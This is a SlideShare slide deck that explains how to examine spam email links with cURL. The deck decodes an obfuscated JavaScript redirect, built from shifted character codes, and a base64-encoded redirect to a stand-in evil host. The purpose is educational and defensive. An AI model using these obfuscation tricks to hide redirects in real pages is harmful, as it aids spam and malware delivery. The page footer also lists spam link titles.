SlideShare ist ein Scribd-Unternehmen logo

Fun with cURL and spam dissection

Als PPTX, PDF herunterladen
Steve Pote
Steve Pote

What I do to get entertainment value from spam. Using the cURL tool to explore your unwanted mail or identify legitimate email improperly identified.

Internet
1 von 11
Fun with cURL and spam (don’t click it, dissect it)
First a Disclaimer… • It isn’t my fault if in your exploration you intentionally or inadvertly do something BAD to your system. • I will try to give enough info to suggest good search terms for independent exploration if this interests you. I am not trying to create any sort of definitive guide or suggesting this is a best or even good way to accomplish a task. • You wouldn’t use a circular saw without knowing how it works. Using shell commands and executing JavaScript from the address bar of your browser is a lot like playing with power tools. You probably will not lose a thumb but there is a likelihood of pain nonetheless.
Spam Everybody gets it, some is obvious, some a little more sneaky and occasionally an email with actual value ends up caught in the email client’s spam net. The screen grab is from MS Outlook, which will show you just the text... Not the html. NO CLICKING LINKS! My example has lots of signs it is garbage and should be set to e-oblivion: • Do you really think that is a google team addy? • This is Not the format I give out for my email (gmail allows mixed caps and dots, like sT.eve.pOte so I can see who sells me out) • Delayed email at some blog URL? C’mon. (This is the URL I will use for an example) • No opt out? Not even one with a malicious addy behind it? They aren’t even trying…(an opt out is required by US law and legit businesses using mass mailings will always have a means to tell them to stop)
cURL, short version and a headstart curl -L -v -A "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17“ http://somewhere.com The switches -L follow redirect (if response sends you immediately elsewhere. There are legitimate uses like url shorteners like goo.gl and bit.ly, but these are also good places to hide bad things too.) -v verbose (I always like verbose output…in this case there is more info about the connects, disconnects and redirects) -A user agent string to send (cURL pretends to be a browser by sending a browser’s info. Example uses pretty common string info to make it an attractive target.)
Here we go… • Verbose text followed by the html of what you would see in your browser if you had clicked the link…
…after some gibberish Most of what was returned was probably a “Markov string”, basically random-esque text with grammatical rules to fool ISP’s and others (like spam filters and web crawlers) into believing the target is legit. When an email slips by your filter with total nonsense in the body it is probably a Markov string and very hard to catch because each email can be made with unique content and including highly relevant individual words.
…the part we are really after • JavaScript at the bottom…it is at the bottom so the rest of the page will load before potential errors or things that might catch malicious scripts • Mileage may vary. This example creates a string from ASCII character codes that have been shifted by -73 places. (I will break that down better later). Base 64 encoding is another common technique I have encountered often (there are legit business reasons to encode strings, I will show you how to check them too).
Magic Happens Here… • I find JavaScript to be pretty Human Readable, but for this example I cheated with Excel… • I needed the ASCII numbers -73 • Then ran the String.fromCharCode in a browser address bar (don’t do this at home, not everything is harmless) • javascript:alert(String.fromCharCode(119,105,110,100,111,119,46,116,111,112,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,39,104,116,116,112,58,47,47,115,109 ,97,114,116,112,105,108,108,115,118,97,108,117,101,46,114,117,39,59)); • If you can write JavaScipt you can neuter the function like this… rather than returning the malicious command it alerts with its text.
Oh, good…another scary link • Here is the output of our example using the chrome browser’s address bar • This JavaScript command redirects your browser to the link inside. • Anecdotally most of the time this is abusing google analytics by creating false hits…opens a couple valid pages, closes and moves on. • Every so often there is something nastier, tracking cookies (mild) or some more virulent web-herpes. • Drop this URL into cURL and repeat if you dare.
A last tidbit or… d2luZG93LnRvcC5sb2NhdGlvbi5ocmVmPSdodHRwczovL3NvbWVldmlsYmFzdGFyZC5jb20n …for short • Base 64 encoding has honest upstanding uses • JavaScript has built in functions to encode (window.btoa())and decode (window.atob()) • I use them to send secret messages ;-) • They can also hide malicious intent
Links for the curious • cURL man page - http://curl.haxx.se/docs/manpage.html • Opt out/Spam laws - https://www.ftc.gov/tips-advice/business-center/guidance/can-spam-act-compliance-guide-business • Markov strings - https://en.wikipedia.org/wiki/Markov_algorithm • atob – https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64/atob • JavaScript from the address bar - http://www.wikihow.com/Have-Fun-With-Your-Address-Bar-on-Your-Browser • Base 64 encoding - https://www.base64decode.org • Me, especially if you are looking for a full stack ‘white hat’ - https://www.linkedin.com/in/steve-pote-61b02b103

Empfohlen

Web 2.0
Web 2.0Web 2.0
Web 2.0Claudia vasco
 
Menschen hergestellte Probleme (German)
Menschen hergestellte Probleme (German)Menschen hergestellte Probleme (German)
Menschen hergestellte Probleme (German)Hitoshi Tsuchiyama
 
Partnering with Students to Develop Mobile Learning
Partnering with Students to Develop Mobile LearningPartnering with Students to Develop Mobile Learning
Partnering with Students to Develop Mobile LearningTamara Pearce
 
Liderazgo
LiderazgoLiderazgo
Liderazgohericmar
 
Enforcing IPRs: a European concise guide for luxury and fashion businesses - ...
Enforcing IPRs: a European concise guide for luxury and fashion businesses - ...Enforcing IPRs: a European concise guide for luxury and fashion businesses - ...
Enforcing IPRs: a European concise guide for luxury and fashion businesses - ...Annabelle Gauberti
 
Fonseca mora martha elena
Fonseca mora martha elenaFonseca mora martha elena
Fonseca mora martha elenaMartha Fonck
 
Jakeliiin
JakeliiinJakeliiin
Jakeliiinjacqueeeeelin
 
Dies ist für jemand , der mir wichtig
Dies ist für jemand , der mir wichtigDies ist für jemand , der mir wichtig
Dies ist für jemand , der mir wichtigManu93112
 

Empfohlen

Web 2.0
Web 2.0Web 2.0
Web 2.0Claudia vasco
 
Menschen hergestellte Probleme (German)
Menschen hergestellte Probleme (German)Menschen hergestellte Probleme (German)
Menschen hergestellte Probleme (German)Hitoshi Tsuchiyama
 
Partnering with Students to Develop Mobile Learning
Partnering with Students to Develop Mobile LearningPartnering with Students to Develop Mobile Learning
Partnering with Students to Develop Mobile LearningTamara Pearce
 
Liderazgo
LiderazgoLiderazgo
Liderazgohericmar
 
Enforcing IPRs: a European concise guide for luxury and fashion businesses - ...
Enforcing IPRs: a European concise guide for luxury and fashion businesses - ...Enforcing IPRs: a European concise guide for luxury and fashion businesses - ...
Enforcing IPRs: a European concise guide for luxury and fashion businesses - ...Annabelle Gauberti
 
Fonseca mora martha elena
Fonseca mora martha elenaFonseca mora martha elena
Fonseca mora martha elenaMartha Fonck
 
Jakeliiin
JakeliiinJakeliiin
Jakeliiinjacqueeeeelin
 
Dies ist für jemand , der mir wichtig
Dies ist für jemand , der mir wichtigDies ist für jemand , der mir wichtig
Dies ist für jemand , der mir wichtigManu93112
 
QUT Carseldine Slide Presentation
QUT Carseldine Slide PresentationQUT Carseldine Slide Presentation
QUT Carseldine Slide Presentationlinda carroli
 
Religion de los mayas
Religion de los mayasReligion de los mayas
Religion de los mayasElias Martinez
 
MOVIMIENTOS SOCIALES
MOVIMIENTOS SOCIALES MOVIMIENTOS SOCIALES
MOVIMIENTOS SOCIALES Universidad Autonoma de Bucaramanga
 
Dia del trabajador
Dia del trabajadorDia del trabajador
Dia del trabajadorSara Trillo
 
Breaking Bad CSP
Breaking Bad CSPBreaking Bad CSP
Breaking Bad CSPLukas Weichselbaum
 
El sujeto y el poder, M. Foucaul
El sujeto y el poder, M. FoucaulEl sujeto y el poder, M. Foucaul
El sujeto y el poder, M. FoucaulUniversidad Autonoma de Bucaramanga
 
Perlas
PerlasPerlas
PerlasAnjovison .
 
Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...
Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...
Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...Charlotte Beauvoisin
 
PROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADO
PROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADOPROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADO
PROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADOHeidiYasmir
 
Markenführung 2020. Michael Scheuch und Olaf Nitz
Markenführung 2020. Michael Scheuch und Olaf NitzMarkenführung 2020. Michael Scheuch und Olaf Nitz
Markenführung 2020. Michael Scheuch und Olaf NitzAustrian National Tourist Office
 
Power Factor Improvement for Industrial and Commercial Power Systems
Power Factor Improvement for Industrial and Commercial Power SystemsPower Factor Improvement for Industrial and Commercial Power Systems
Power Factor Improvement for Industrial and Commercial Power SystemsDel Ventruella
 
Medios audiovisules en clase lorena.
Medios audiovisules en clase lorena.Medios audiovisules en clase lorena.
Medios audiovisules en clase lorena.21algoeco
 
Trabajo de campo 1
Trabajo de campo 1Trabajo de campo 1
Trabajo de campo 1AndreaGranada
 
Caso práctico: cómo aterrizar un proyecto de customer experience y social me...
Caso práctico: cómo aterrizar un proyecto de customer experience y social me...Caso práctico: cómo aterrizar un proyecto de customer experience y social me...
Caso práctico: cómo aterrizar un proyecto de customer experience y social me...BOIRON España
 
examen
examenexamen
examenabra_al
 
CppCat Static Analyzer Review
CppCat Static Analyzer ReviewCppCat Static Analyzer Review
CppCat Static Analyzer ReviewAndrey Karpov
 
Monitoring a program that monitors computer networks
Monitoring a program that monitors computer networksMonitoring a program that monitors computer networks
Monitoring a program that monitors computer networksPVS-Studio
 
XSS and How to Escape
XSS and How to EscapeXSS and How to Escape
XSS and How to EscapeTyler Peterson
 
A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...
A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...
A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...Andrey Karpov
 
What Are We Still Doing Wrong
What Are We Still Doing WrongWhat Are We Still Doing Wrong
What Are We Still Doing Wrongafa reg
 
All of javascript
All of javascriptAll of javascript
All of javascriptTogakangaroo
 
All of Javascript
All of JavascriptAll of Javascript
All of JavascriptTogakangaroo
 

Weitere ähnliche Inhalte

Andere mochten auch

QUT Carseldine Slide Presentation
QUT Carseldine Slide PresentationQUT Carseldine Slide Presentation
QUT Carseldine Slide Presentationlinda carroli
 
Dia del trabajador
Dia del trabajadorDia del trabajador
Dia del trabajadorSara Trillo
 
Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...
Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...
Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...Charlotte Beauvoisin
 
PROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADO
PROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADOPROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADO
PROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADOHeidiYasmir
 
Power Factor Improvement for Industrial and Commercial Power Systems
Power Factor Improvement for Industrial and Commercial Power SystemsPower Factor Improvement for Industrial and Commercial Power Systems
Power Factor Improvement for Industrial and Commercial Power SystemsDel Ventruella
 
Medios audiovisules en clase lorena.
Medios audiovisules en clase lorena.Medios audiovisules en clase lorena.
Medios audiovisules en clase lorena.21algoeco
 
Caso práctico: cómo aterrizar un proyecto de customer experience y social me...
Caso práctico: cómo aterrizar un proyecto de customer experience y social me...Caso práctico: cómo aterrizar un proyecto de customer experience y social me...
Caso práctico: cómo aterrizar un proyecto de customer experience y social me...BOIRON España
 

Andere mochten auch (15)

QUT Carseldine Slide Presentation
QUT Carseldine Slide PresentationQUT Carseldine Slide Presentation
QUT Carseldine Slide Presentation
 
Religion de los mayas
Religion de los mayasReligion de los mayas
Religion de los mayas
 
MOVIMIENTOS SOCIALES
MOVIMIENTOS SOCIALES MOVIMIENTOS SOCIALES
MOVIMIENTOS SOCIALES
 
Dia del trabajador
Dia del trabajadorDia del trabajador
Dia del trabajador
 
Breaking Bad CSP
Breaking Bad CSPBreaking Bad CSP
Breaking Bad CSP
 
El sujeto y el poder, M. Foucaul
El sujeto y el poder, M. FoucaulEl sujeto y el poder, M. Foucaul
El sujeto y el poder, M. Foucaul
 
Perlas
PerlasPerlas
Perlas
 
Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...
Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...
Personalised Uganda photo souvenir maps - safari souvenirs, lodge decor, leav...
 
PROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADO
PROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADOPROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADO
PROCESOS DE FABRICACIÓN DE PIEZAS METÁLICAS Y HERRAMIENTAS DE MANO Y DE TRAZADO
 
Markenführung 2020. Michael Scheuch und Olaf Nitz
Markenführung 2020. Michael Scheuch und Olaf NitzMarkenführung 2020. Michael Scheuch und Olaf Nitz
Markenführung 2020. Michael Scheuch und Olaf Nitz
 
Power Factor Improvement for Industrial and Commercial Power Systems
Power Factor Improvement for Industrial and Commercial Power SystemsPower Factor Improvement for Industrial and Commercial Power Systems
Power Factor Improvement for Industrial and Commercial Power Systems
 
Medios audiovisules en clase lorena.
Medios audiovisules en clase lorena.Medios audiovisules en clase lorena.
Medios audiovisules en clase lorena.
 
Trabajo de campo 1
Trabajo de campo 1Trabajo de campo 1
Trabajo de campo 1
 
Caso práctico: cómo aterrizar un proyecto de customer experience y social me...
Caso práctico: cómo aterrizar un proyecto de customer experience y social me...Caso práctico: cómo aterrizar un proyecto de customer experience y social me...
Caso práctico: cómo aterrizar un proyecto de customer experience y social me...
 
examen
examenexamen
examen
 

Ähnlich wie Fun with cURL and spam dissection

CppCat Static Analyzer Review
CppCat Static Analyzer ReviewCppCat Static Analyzer Review
CppCat Static Analyzer ReviewAndrey Karpov
 
Monitoring a program that monitors computer networks
Monitoring a program that monitors computer networksMonitoring a program that monitors computer networks
Monitoring a program that monitors computer networksPVS-Studio
 
A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...
A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...
A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...Andrey Karpov
 
What Are We Still Doing Wrong
What Are We Still Doing WrongWhat Are We Still Doing Wrong
What Are We Still Doing Wrongafa reg
 
How to find 56 potential vulnerabilities in FreeBSD code in one evening
How to find 56 potential vulnerabilities in FreeBSD code in one eveningHow to find 56 potential vulnerabilities in FreeBSD code in one evening
How to find 56 potential vulnerabilities in FreeBSD code in one eveningPVS-Studio
 
Building unit tests correctly
Building unit tests correctlyBuilding unit tests correctly
Building unit tests correctlyDror Helper
 
Are 64-bit errors real?
Are 64-bit errors real?Are 64-bit errors real?
Are 64-bit errors real?PVS-Studio
 
Design patterns - The Good, the Bad, and the Anti-Pattern
Design patterns - The Good, the Bad, and the Anti-PatternDesign patterns - The Good, the Bad, and the Anti-Pattern
Design patterns - The Good, the Bad, and the Anti-PatternBarry O Sullivan
 
Intro to JavaScript
Intro to JavaScriptIntro to JavaScript
Intro to JavaScriptDan Phiffer
 
Leo Tolstoy and static code analysis
Leo Tolstoy and static code analysisLeo Tolstoy and static code analysis
Leo Tolstoy and static code analysisPVS-Studio
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs ChromiumAndrey Karpov
 
How to Use Cryptography Properly: Common Mistakes People Make When Using Cry...
How to Use Cryptography Properly: Common Mistakes People Make When Using Cry...How to Use Cryptography Properly: Common Mistakes People Make When Using Cry...
How to Use Cryptography Properly: Common Mistakes People Make When Using Cry...All Things Open
 
How to fix bug or defects in software
How to fix bug or defects in software How to fix bug or defects in software
How to fix bug or defects in software Rajasekar Subramanian
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacPriyanka Aash
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio
 
Analysis of Godot Engine's Source Code
Analysis of Godot Engine's Source CodeAnalysis of Godot Engine's Source Code
Analysis of Godot Engine's Source CodePVS-Studio
 

Ähnlich wie Fun with cURL and spam dissection (20)

CppCat Static Analyzer Review
CppCat Static Analyzer ReviewCppCat Static Analyzer Review
CppCat Static Analyzer Review
 
Monitoring a program that monitors computer networks
Monitoring a program that monitors computer networksMonitoring a program that monitors computer networks
Monitoring a program that monitors computer networks
 
XSS and How to Escape
XSS and How to EscapeXSS and How to Escape
XSS and How to Escape
 
A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...
A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...
A Bonus to the "Three Interviews About Static Analyzers" Article, or Intervie...
 
What Are We Still Doing Wrong
What Are We Still Doing WrongWhat Are We Still Doing Wrong
What Are We Still Doing Wrong
 
All of javascript
All of javascriptAll of javascript
All of javascript
 
All of Javascript
All of JavascriptAll of Javascript
All of Javascript
 
How to find 56 potential vulnerabilities in FreeBSD code in one evening
How to find 56 potential vulnerabilities in FreeBSD code in one eveningHow to find 56 potential vulnerabilities in FreeBSD code in one evening
How to find 56 potential vulnerabilities in FreeBSD code in one evening
 
Building unit tests correctly
Building unit tests correctlyBuilding unit tests correctly
Building unit tests correctly
 
Are 64-bit errors real?
Are 64-bit errors real?Are 64-bit errors real?
Are 64-bit errors real?
 
Design patterns - The Good, the Bad, and the Anti-Pattern
Design patterns - The Good, the Bad, and the Anti-PatternDesign patterns - The Good, the Bad, and the Anti-Pattern
Design patterns - The Good, the Bad, and the Anti-Pattern
 
Intro to JavaScript
Intro to JavaScriptIntro to JavaScript
Intro to JavaScript
 
Leo Tolstoy and static code analysis
Leo Tolstoy and static code analysisLeo Tolstoy and static code analysis
Leo Tolstoy and static code analysis
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs Chromium
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs Chromium
 
How to Use Cryptography Properly: Common Mistakes People Make When Using Cry...
How to Use Cryptography Properly: Common Mistakes People Make When Using Cry...How to Use Cryptography Properly: Common Mistakes People Make When Using Cry...
How to Use Cryptography Properly: Common Mistakes People Make When Using Cry...
 
How to fix bug or defects in software
How to fix bug or defects in software How to fix bug or defects in software
How to fix bug or defects in software
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
 
PVS-Studio vs Chromium
PVS-Studio vs ChromiumPVS-Studio vs Chromium
PVS-Studio vs Chromium
 
Analysis of Godot Engine's Source Code
Analysis of Godot Engine's Source CodeAnalysis of Godot Engine's Source Code
Analysis of Godot Engine's Source Code
 

Kürzlich hochgeladen

『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书rnrncn29
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Sonam Pathan
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012rehmti665
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Dana Luther
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一Fs
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 
Intellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptxIntellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptxBipin Adhikari
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationLinaWolf1
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一Fs
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleanscorenetworkseo
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMgdsc13
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 

Kürzlich hochgeladen (20)

Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Serviceyoung call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
 
Intellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptxIntellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptx
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 Documentation
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleans
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITM
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 

Fun with cURL and spam dissection

  • 1. Fun with cURL and spam (don’t click it, dissect it)
  • 2. First a Disclaimer… • It isn’t my fault if in your exploration you intentionally or inadvertly do something BAD to your system. • I will try to give enough info to suggest good search terms for independent exploration if this interests you. I am not trying to create any sort of definitive guide or suggesting this is a best or even good way to accomplish a task. • You wouldn’t use a circular saw without knowing how it works. Using shell commands and executing JavaScript from the address bar of your browser is a lot like playing with power tools. You probably will not lose a thumb but there is a likelihood of pain nonetheless.
